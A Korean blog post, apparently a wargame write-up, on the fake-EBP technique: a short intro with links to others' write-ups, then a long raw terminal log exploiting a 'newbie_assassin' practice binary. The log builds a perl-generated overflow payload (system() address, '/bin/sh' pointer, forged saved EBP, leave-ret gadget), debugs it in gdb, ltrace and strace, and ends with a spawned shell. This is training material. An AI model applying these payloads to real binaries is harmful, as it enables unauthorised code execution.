febp가 머져 먹는건가여 그렁가봉가
febp 이해하는데 사용한 링크들 적어둘께요(몇개는 못찾겠어여 엄청 좋은거 많았는데 다 검색기록 다 날리고 으허엏어헝)
http://sangu1ne.tistory.com/9 <<-여기 Sanguine형 블러그 여기 롸잇업 짱임여! 롸잇업 뿐만아니라 그냥 짱짱
http://1tchy.tistory.com/entry/fake-ebp <<-간지해커 잇치형의 블러그! 여기 역시 롸잇업 짱임!
이런분들 사이에 끼어 살다니 영광이빈다..
&&... cd80 ㅎ ㄳㄳㄳ
우선 지금 매우 피곤한 관계로 로그를 올려놓고 이만 자러가겟슴다.. 수정 내일해야지
login: assassin
Password:
Last login: Thu Apr 24 17:43:56 from 192.168.10.1
[assassin@localhost assassin]$ bash2
[assassin@localhost assassin]$ payload= [dummyx4, system()[0x40058ae0], dummyx4, binsh[0xbffffc79], nopx24] [sfp->buffer[0xbffffc1a]] [ret->leaveret[0x80484df]]
bash: syntax error near unexpected token `system()'
[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`
AAAA@BBBBù¿@(ü ¿߄
Segmentation fault (core dumped)
[assassin@localhost assassin]$ gdb -q ./newbie_assassin
(gdb) disas main
Dump of assembler code for function main:
0x8048440 <main>: push %ebp
0x8048441 <main+1>: mov %esp,%ebp
0x8048443 <main+3>: sub $0x28,%esp
0x8048446 <main+6>: cmpl $0x1,0x8(%ebp)
0x804844a <main+10>: jg 0x8048463 <main+35>
0x804844c <main+12>: push $0x8048540
0x8048451 <main+17>: call 0x8048354 <printf>
0x8048456 <main+22>: add $0x4,%esp
0x8048459 <main+25>: push $0x0
0x804845b <main+27>: call 0x8048364 <exit>
0x8048460 <main+32>: add $0x4,%esp
0x8048463 <main+35>: mov 0xc(%ebp),%eax
0x8048466 <main+38>: add $0x4,%eax
0x8048469 <main+41>: mov (%eax),%edx
0x804846b <main+43>: add $0x2f,%edx
0x804846e <main+46>: cmpb $0xbf,(%edx)
0x8048471 <main+49>: jne 0x8048490 <main+80>
0x8048473 <main+51>: push $0x804854c
0x8048478 <main+56>: call 0x8048354 <printf>
0x804847d <main+61>: add $0x4,%esp
0x8048480 <main+64>: push $0x0
0x8048482 <main+66>: call 0x8048364 <exit>
0x8048487 <main+71>: add $0x4,%esp
0x804848a <main+74>: lea 0x0(%esi),%esi
0x8048490 <main+80>: mov 0xc(%ebp),%eax
0x8048493 <main+83>: add $0x4,%eax
0x8048496 <main+86>: mov (%eax),%edx
0x8048498 <main+88>: add $0x2f,%edx
0x804849b <main+91>: cmpb $0x40,(%edx)
---Type <return> to continue, or q <return> to quit---
0x804849e <main+94>: jne 0x80484b7 <main+119>
0x80484a0 <main+96>: push $0x8048561
0x80484a5 <main+101>: call 0x8048354 <printf>
0x80484aa <main+106>: add $0x4,%esp
0x80484ad <main+109>: push $0x0
0x80484af <main+111>: call 0x8048364 <exit>
0x80484b4 <main+116>: add $0x4,%esp
0x80484b7 <main+119>: push $0x30
0x80484b9 <main+121>: mov 0xc(%ebp),%eax
0x80484bc <main+124>: add $0x4,%eax
0x80484bf <main+127>: mov (%eax),%edx
0x80484c1 <main+129>: push %edx
0x80484c2 <main+130>: lea 0xffffffd8(%ebp),%eax
0x80484c5 <main+133>: push %eax
0x80484c6 <main+134>: call 0x8048374 <strncpy>
0x80484cb <main+139>: add $0xc,%esp
0x80484ce <main+142>: lea 0xffffffd8(%ebp),%eax
0x80484d1 <main+145>: push %eax
0x80484d2 <main+146>: push $0x804857e
0x80484d7 <main+151>: call 0x8048354 <printf>
0x80484dc <main+156>: add $0x8,%esp
0x80484df <main+159>: leave
0x80484e0 <main+160>: ret
0x80484e1 <main+161>: nop
0x80484e2 <main+162>: nop
0x80484e3 <main+163>: nop
0x80484e4 <main+164>: nop
0x80484e5 <main+165>: nop
0x80484e6 <main+166>: nop
0x80484e7 <main+167>: nop
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) b *main+160
Breakpoint 1 at 0x80484e0
(gdb) r `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`
Starting program: /home/assassin/./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`
AAAA@BBBBù¿@(ü
Breakpoint 1, 0x80484e0 in main ()
(gdb) x/wx $esp
0xbffffacc: 0x00000000
(gdb) r `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xaa\xbf", "\xdf\x84\x04\x08"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/assassin/./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xaa\xbf", "\xdf\x84\x04\x08"'`
AAAA@BBBBù¿@(üª¿߄
Breakpoint 1, 0x80484e0 in main ()
(gdb) x/wx $esp
0xbffffacc: 0x080484df
(gdb) x/i 0x80484df
0x80484df <main+159>: leave
(gdb) i r ebp
Ambiguous info command "r ebp": registers, remote-process.
(gdb) i reg ebp
ebp 0xbfaafc28 -1079313368
(gdb) set $ebp=0xbffffc28
(gdb) x/20wx 0xbffffc28
0xbffffc28: 0x6e697373 0x41414100 0x058ae041 0x42424240
0xbffffc38: 0x0fbff942 0x90909040 0x90909090 0x90909090
0xbffffc48: 0x90909090 0x90909090 0x90909090 0xaafc2890
0xbffffc58: 0x0484dfbf 0x454c0008 0x504f5353 0x7c3d4e45
0xbffffc68: 0x7273752f 0x6e69622f 0x73656c2f 0x70697073
(gdb) x/20wx 0xbffffc2a
0xbffffc2a: 0x41006e69 0xe0414141 0x4240058a 0xf9424242
0xbffffc3a: 0x90400fbf 0x90909090 0x90909090 0x90909090
0xbffffc4a: 0x90909090 0x90909090 0x28909090 0xdfbfaafc
0xbffffc5a: 0x00080484 0x5353454c 0x4e45504f 0x752f7c3d
0xbffffc6a: 0x622f7273 0x6c2f6e69 0x70737365 0x2e657069
(gdb) x/20wx 0xbffffc2b
0xbffffc2b: 0x4141006e 0x8ae04141 0x42424005 0xbff94242
0xbffffc3b: 0x9090400f 0x90909090 0x90909090 0x90909090
0xbffffc4b: 0x90909090 0x90909090 0xfc289090 0x84dfbfaa
0xbffffc5b: 0x4c000804 0x4f535345 0x3d4e4550 0x73752f7c
0xbffffc6b: 0x69622f72 0x656c2f6e 0x69707373 0x732e6570
(gdb) x/20wx 0xbffffc9
0xbffffc9: Cannot access memory at address 0xbffffc9
(gdb) x/20wx 0xbffffc29
0xbffffc29: 0x006e6973 0x41414141 0x40058ae0 0x42424242
0xbffffc39: 0x400fbff9 0x90909090 0x90909090 0x90909090
0xbffffc49: 0x90909090 0x90909090 0x90909090 0xbfaafc28
0xbffffc59: 0x080484df 0x53454c00 0x45504f53 0x2f7c3d4e
0xbffffc69: 0x2f727375 0x2f6e6962 0x7373656c 0x65706970
(gdb) x/20wx 0xbffffc2d
0xbffffc2d: 0x41414141 0x40058ae0 0x42424242 0x400fbff9
0xbffffc3d: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc4d: 0x90909090 0x90909090 0xbfaafc28 0x080484df
0xbffffc5d: 0x53454c00 0x45504f53 0x2f7c3d4e 0x2f727375
0xbffffc6d: 0x2f6e6962 0x7373656c 0x65706970 0x2068732e
(gdb) q
The program is running. Exit anyway? (y or n) y
[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2d\xfc\xff\xbf", "\xdf\x84\x04\x08"'`
AAAA@BBBBù¿@-ü ¿߄
Segmentation fault (core dumped)
[assassin@localhost assassin]$ gdb -c core -q
Core was generated by `./newbie_assassin AAAA@BBBBù¿@-ü ¿'.
Program terminated with signal 11, Segmentation fault.
#0 0xf9424242 in ?? ()
(gdb) q
[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`
AAAA@BBBBù¿@(ü ¿߄
Segmentation fault (core dumped)
[assassin@localhost assassin]$ gdb -c core -q
Core was generated by ` AAAAAAAABBBBù¿@(ü ¿'.
Program terminated with signal 11, Segmentation fault.
#0 0x42424242 in ?? ()
(gdb) q
[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x24\xfc\xff\xbf", "\xdf\x84\x04\x08"'`
AAAA@BBBBù¿@$ü ¿߄
Segmentation fault (core dumped)
[assassin@localhost assassin]$ gdb -c core -q
Core was generated by `./newbie_assassin AAAA@BBBBù¿@$ü ¿'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) q
[assassin@localhost assassin]$ ltrace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`
[080483b1] __libc_start_main(0x08048440, 2, 0xbffffb24, 0x080482e4, 0x0804851c <unfinished ...>
[0804842b] __register_frame_info(0x08049590, 0x0804966c, 0xbffffae4, 0x08048309, 0x401081ec) = 0x40108d40
[080484cb] strncpy(0xbffffab0, "AAAA\340\212\005@BBBB\371\277\017@\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220"..., 48) = 0xbffffab0
[080484dc] printf("%s\n", "AAAA\340\212\005@BBBB\371\277\017@\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220"...AAAA@BBBBù¿@
(ü ¿߄
) = 50
[8ae04141] --- SIGSEGV (Segmentation fault) ---
[ffffffff] +++ killed by SIGSEGV +++
[assassin@localhost assassin]$ sltrace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2a\xfc\xff\xbf", "\xdf\x84\x04\x08"'`
bash2: sltrace: command not found
[assassin@localhost assassin]$ ltrace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2a\xfc\xff\xbf", "\xdf\x84\x04\x08"'`
[080483b1] __libc_start_main(0x08048440, 2, 0xbffffb24, 0x080482e4, 0x0804851c <unfinished ...>
[0804842b] __register_frame_info(0x08049590, 0x0804966c, 0xbffffae4, 0x08048309, 0x401081ec) = 0x40108d40
[080484cb] strncpy(0xbffffab0, "AAAA\340\212\005@BBBB\371\277\017@\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220"..., 48) = 0xbffffab0
[080484dc] printf("%s\n", "AAAA\340\212\005@BBBB\371\277\017@\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220"...AAAA@BBBBù¿@
*ü ¿߄
) = 50
[pid 4039] [40036cb5] --- SIGCHLD (Child exited) ---
[pid 4039] [42424242] --- SIGSEGV (Segmentation fault) ---
[pid 4039] [ffffffff] +++ killed by SIGSEGV +++
[assassin@localhost assassin]$ strace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2a\xfc\xff\xbf", "\xdf\x84\x04\x08"'`
upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process
[????????] execve("./newbie_assassin", ["./newbie_assassin", "AAAA@BBBBù¿@*ü ¿"], [/* 22 vars */]) = 0
[4000f78c] brk(0) = 0x8049684
[4000f84d] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000
[4000ee54] open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)
[4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 3
[4000ed5d] fstat(3, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0
[4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40015000
[4000ee8d] close(3) = 0
[4000ee54] open("/lib/libc.so.6", O_RDONLY) = 3
[4000ed5d] fstat(3, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0
[4000eed4] read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096
[4000f84d] old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40018000
[4000f8d4] mprotect(0x40105000, 30812, PROT_NONE) = 0
[4000f84d] old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0xec000) = 0x40105000
[4000f84d] old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000
[4000ee8d] close(3) = 0
[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0
[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0
[4000f891] munmap(0x40015000, 12210) = 0
[400ca7fd] personality(PER_LINUX) = 0
[400aa257] getpid() = 4043
[400bdc8c] fstat64(0x1, 0xbffff2f8) = -1 ENOSYS (Function not implemented)
[400bdcd3] fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
[400c7afd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000
[400c4b54] ioctl(1, TCGETS, {B9600 opost isig icanon echo ...}) = 0
[400beb14] write(1, "AAAA\340\212\5@BBBB\371\277\17@\220\220\220\220\220\220"..., 50AAAA@BBBBù¿@*ü ¿߄
) = 50
[40036ae2] rt_sigaction(SIGINT, {SIG_IGN}, {SIG_DFL}, 8) = 0
[40036ae2] rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0
[40036cb5] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
[400a9cc8] vfork() = 4044
[400a98e9] wait4(4044, [WIFEXITED(s) && WEXITSTATUS(s) == 127], 0, NULL) = 4044
[40036ae2] rt_sigaction(SIGINT, {SIG_DFL}, NULL, 8) = 0
[40036ae2] rt_sigaction(SIGQUIT, {SIG_DFL}, NULL, 8) = 0
[40036cb5] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[40036cb5] --- SIGCHLD (Child exited) ---
[42424242] --- SIGSEGV (Segmentation fault) ---
upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process
[????????] +++ killed by SIGSEGV +++
[assassin@localhost assassin]$ strace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2a\xfc\xff\xbf", "AAAA", "\xdf\x84\x04\x08"'`
upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process
[????????] execve("./newbie_assassin", ["./newbie_assassin", "AAAA@BBBBù¿@*ü ¿AAAA"], [/* 22 vars */]) = 0
[4000f78c] brk(0) = 0x8049684
[4000f84d] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000
[4000ee54] open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)
[4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 3
[4000ed5d] fstat(3, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0
[4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40015000
[4000ee8d] close(3) = 0
[4000ee54] open("/lib/libc.so.6", O_RDONLY) = 3
[4000ed5d] fstat(3, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0
[4000eed4] read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096
[4000f84d] old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40018000
[4000f8d4] mprotect(0x40105000, 30812, PROT_NONE) = 0
[4000f84d] old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0xec000) = 0x40105000
[4000f84d] old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000
[4000ee8d] close(3) = 0
[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0
[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0
[4000f891] munmap(0x40015000, 12210) = 0
[400ca7fd] personality(PER_LINUX) = 0
[400aa257] getpid() = 4047
[400bdc8c] fstat64(0x1, 0xbffff2e8) = -1 ENOSYS (Function not implemented)
[400bdcd3] fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
[400c7afd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000
[400c4b54] ioctl(1, TCGETS, {B9600 opost isig icanon echo ...}) = 0
[400beb14] write(1, "AAAA\340\212\5@BBBB\371\277\17@\220\220\220\220\220\220"..., 50AAAA@BBBBù¿@*ü ¿AAAA
) = 50
[41414141] --- SIGSEGV (Segmentation fault) ---
upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process
[????????] +++ killed by SIGSEGV +++
[assassin@localhost assassin]$ gdb -c core -q
Core was generated by `./newbie_assassin AAAA@BBBBù¿@*ü ¿AAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) x/20wx $esp-40
0xbffffaa8: 0x42424242 0x400fbff9 0x90909090 0x90909090
0xbffffab8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffac8: 0xbffffc2a 0x41414141 0x00000002 0xbffffb14
0xbffffad8: 0xbffffb20 0x40013868 0x00000002 0x08048390
0xbffffae8: 0x00000000 0x080483b1 0x08048440 0x00000002
(gdb) x/20wx $esp-60
0xbffffa94: 0x080484dc 0x0804857e 0xbffffaa0 0x41414141
0xbffffaa4: 0x40058ae0 0x42424242 0x400fbff9 0x90909090
0xbffffab4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffac4: 0x90909090 0xbffffc2a 0x41414141 0x00000002
0xbffffad4: 0xbffffb14 0xbffffb20 0x40013868 0x00000002
(gdb) 6q
Undefined command: "6q". Try "help".
(gdb) q
[assassin@localhost assassin]$ strace -if ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x2a\xfc\xff\xbf", "AAAA"'`
upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process
[????????] execve("./newbie_assassin", ["./newbie_assassin", "AAAA@BBBBù¿@*ü ¿AAAA"], [/* 22 vars */]) = 0
[4000f78c] brk(0) = 0x8049684
[4000f84d] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000
[4000ee54] open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)
[4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 3
[4000ed5d] fstat(3, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0
[4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40015000
[4000ee8d] close(3) = 0
[4000ee54] open("/lib/libc.so.6", O_RDONLY) = 3
[4000ed5d] fstat(3, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0
[4000eed4] read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096
[4000f84d] old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40018000
[4000f8d4] mprotect(0x40105000, 30812, PROT_NONE) = 0
[4000f84d] old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0xec000) = 0x40105000
[4000f84d] old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000
[4000ee8d] close(3) = 0
[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0
[4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0
[4000f891] munmap(0x40015000, 12210) = 0
[400ca7fd] personality(PER_LINUX) = 0
[400aa257] getpid() = 4051
[400bdc8c] fstat64(0x1, 0xbffff2f8) = -1 ENOSYS (Function not implemented)
[400bdcd3] fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
[400c7afd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000
[400c4b54] ioctl(1, TCGETS, {B9600 opost isig icanon echo ...}) = 0
[400beb14] write(1, "AAAA\340\212\5@BBBB\371\277\17@\220\220\220\220\220\220"..., 50AAAA@BBBBù¿@*ü ¿AAAA
) = 50
[41414141] --- SIGSEGV (Segmentation fault) ---
upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process
[????????] +++ killed by SIGSEGV +++
[assassin@localhost assassin]$ gdb -c core -q
Core was generated by `./newbie_assassin AAAA@BBBBù¿@*ü ¿AAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) x/50wx $esp-60
0xbffffaa4: 0x080484dc 0x0804857e 0xbffffab0 0x41414141
0xbffffab4: 0x40058ae0 0x42424242 0x400fbff9 0x90909090
0xbffffac4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffad4: 0x90909090 0xbffffc2a 0x41414141 0x00000002
0xbffffae4: 0xbffffb24 0xbffffb30 0x40013868 0x00000002
0xbffffaf4: 0x08048390 0x00000000 0x080483b1 0x08048440
0xbffffb04: 0x00000002 0xbffffb24 0x080482e4 0x0804851c
0xbffffb14: 0x4000ae60 0xbffffb1c 0x40013e90 0x00000002
0xbffffb24: 0xbffffc18 0xbffffc2a 0x00000000 0xbffffc5b
0xbffffb34: 0xbffffc6e 0xbffffc86 0xbffffca5 0xbffffcc7
0xbffffb44: 0xbffffcd5 0xbffffe98 0xbffffeb7 0xbffffed5
0xbffffb54: 0xbffffeea 0xbfffff0a 0xbfffff15 0xbfffff26
0xbffffb64: 0xbfffff2e 0xbfffff38
(gdb) q
[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`
AAAA@BBBBù¿@°ú ¿߄
bash$ exit
exit
Segmentation fault (core dumped)
[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\x28\xfc\xff\xbf", "\xdf\x84\x04\x08"'`
AAAA@BBBBù¿@(ü ¿߄
Segmentation fault (core dumped)
[assassin@localhost assassin]$ gdb -c core -q
Core was generated by ` AAAAAAAABBBBù¿@(ü ¿'.
Program terminated with signal 11, Segmentation fault.
#0 0x42424242 in ?? ()
(gdb)x/40wx $esp
0xbffffc34: 0x400fbff9 0x90909090 0x90909090 0x90909090
0xbffffc44: 0x90909090 0x90909090 0x90909090 0xbffffc28
0xbffffc54: 0x080484df 0x44575000 0x6f682f3d 0x612f656d
0xbffffc64: 0x73617373 0x006e6973 0x4f4d4552 0x4f484554
0xbffffc74: 0x313d5453 0x312e3239 0x312e3836 0x00312e30
0xbffffc84: 0x54534f48 0x454d414e 0x636f6c3d 0x6f686c61
0xbffffc94: 0x6c2e7473 0x6c61636f 0x616d6f64 0x4c006e69
0xbffffca4: 0x4f535345 0x3d4e4550 0x73752f7c 0x69622f72
0xbffffcb4: 0x656c2f6e 0x69707373 0x732e6570 0x73252068
0xbffffcc4: 0x45535500 0x73613d52 0x73736173 0x4c006e69
(gdb) x/40wx $esp-40
0xbffffc0c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc1c: 0x00000000 0x00000000 0x00000000 0x41414141
0xbffffc2c: 0x41414141 0x42424242 0x400fbff9 0x90909090
0xbffffc3c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc4c: 0x90909090 0xbffffc28 0x080484df 0x44575000
0xbffffc5c: 0x6f682f3d 0x612f656d 0x73617373 0x006e6973
0xbffffc6c: 0x4f4d4552 0x4f484554 0x313d5453 0x312e3239
0xbffffc7c: 0x312e3836 0x00312e30 0x54534f48 0x454d414e
0xbffffc8c: 0x636f6c3d 0x6f686c61 0x6c2e7473 0x6c61636f
0xbffffc9c: 0x616d6f64 0x4c006e69 0x4f535345 0x3d4e4550
(gdb) x/40wx $esp-100
0xbffffbd0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbe0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbf0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc00: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc10: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc20: 0x00000000 0x00000000 0x41414141 0x41414141
0xbffffc30: 0x42424242 0x400fbff9 0x90909090 0x90909090
0xbffffc40: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc50: 0xbffffc28 0x080484df 0x44575000 0x6f682f3d
0xbffffc60: 0x612f656d 0x73617373 0x006e6973 0x4f4d4552
(gdb) x/40wx $esp-200
0xbffffb6c: 0x00000000 0x00000000 0x40020e90 0x00000612
0xbffffb7c: 0x40021fd0 0x4001ad70 0x400143e0 0x00000003
0xbffffb8c: 0x40014650 0x00000001 0xbffff8ac 0x00000000
0xbffffb9c: 0x4003ec68 0x00000001 0x00000000 0x00000000
0xbffffbac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbbc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbcc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbdc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbfc: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) x/40wx $esp-2000
0xbffff464: 0x4001797a 0x08048581 0x25000000 0x00000000
0xbffff474: 0x00000001 0x00000000 0x40014353 0x000ed000
0xbffff484: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff494: 0x00000000 0x40018000 0x0000005e 0xbfffe3fc
0xbffff4a4: 0xbfffe400 0xbfffe404 0xbfffe408 0xbfffe40c
0xbffff4b4: 0xbfffe410 0xbfffe548 0x00000000 0x00000000
0xbffff4c4: 0x00002fb2 0x00001000 0x00000018 0x535975ed
0xbffff4d4: 0x0000385c 0x400143e0 0x00000018 0x000ed9c0
0xbffff4e4: 0x00000002 0xbfffe414 0xbfffe3e4 0xbfffe45c
0xbffff4f4: 0x00001000 0xbfffe45c 0x00000003 0x000f485c
(gdb)
0xbffff504: 0xbfffe530 0xbfffe490 0x40013ed0 0x00000808
0xbffff514: 0x00000000 0x00000000 0x0000675b 0x000081a4
0xbffff524: 0x00000001 0x00000000 0x00000000 0x00000808
0xbffff534: 0x00000000 0x00000000 0x40001402 0xbffff610
0xbffff544: 0x400081e6 0x400013e1 0x400013e1 0x40013868
0xbffff554: 0x400013a5 0x20730824 0xffffffff 0xffffffcf
0xbffff564: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff574: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff584: 0xbffffab0 0x00000000 0xbffff614 0x40000814
0xbffff594: 0x00000052 0x00000000 0x00000000 0x00000001
(gdb) x/40wx $esp-500
0xbffffa40: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa50: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa60: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa70: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa80: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa90: 0x00000000 0x40029b0e 0xbffff8f4 0x400081e6
0xbffffaa0: 0x40029ad5 0x40029ad5 0x40013868 0x400143e0
0xbffffab0: 0x00006805 0x00000203 0x00000203 0x00000203
0xbffffac0: 0x00000006 0x08048034 0x08048390 0xbffff87c
0xbffffad0: 0x40002179 0x00006120 0x4000220c 0x08048390
(gdb)
0xbffffae0: 0x00000000 0x00000000 0x40020e90 0x00000612
0xbffffaf0: 0x40021fd0 0x4001ad70 0x400143e0 0x00000003
0xbffffb00: 0x40014650 0x00000001 0xbffff8ac 0x00000000
0xbffffb10: 0x4003ec68 0x00000000 0x00000000 0x00000000
0xbffffb20: 0x40029b0e 0xbffff8f4 0x400081e6 0x40029ad5
0xbffffb30: 0x40029ad5 0x40013868 0x400143e0 0x00006805
0xbffffb40: 0x00000203 0x00000203 0x00000203 0x00000006
0xbffffb50: 0x08048034 0x08048390 0xbffff87c 0x40002179
